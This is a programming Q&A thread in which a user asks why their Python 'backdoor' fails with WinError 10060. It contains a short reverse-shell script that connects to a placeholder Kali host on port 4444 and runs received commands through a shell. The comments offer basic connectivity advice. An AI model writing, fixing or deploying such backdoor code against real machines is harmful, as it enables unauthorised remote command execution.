# What is the cause of WinError 10060 Python Error in my code?

Tags: python, python-3.x

I am creating a backdoor project for fun and I ran into an error that I cant fix so here is the code:

```
    #!/usr/bin/python
import socket
import subprocess

def execute_system_command(command):
    return subprocess.check_output(command, shel=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("VMKaliIP",4444))
connection.send("connected")


while True:
    command = connection.recv(1024)
    command_result = execute_system_command(command)
    connection.send(command_result)

connection.close()
```

The error I get:  **[WinError 10060] A connection attempt failed because the connected party did not properly
respond after a period of time, or established connection failed because connected host has failed to respond**

so I run NetCat on my virtual Kali machine on port 4444 but I get nothing back.
Any Ideas?

Comment: Try to open up the IP + port in your web browser, and see what that one says

Comment: At means that you are sending a connection request to "VMKaliIP" and they are not responding. Is this a valid hostname on your router?

Comment: yes Its my virtual machines ip

Comment: @Programmer like should i write it literally and on which machine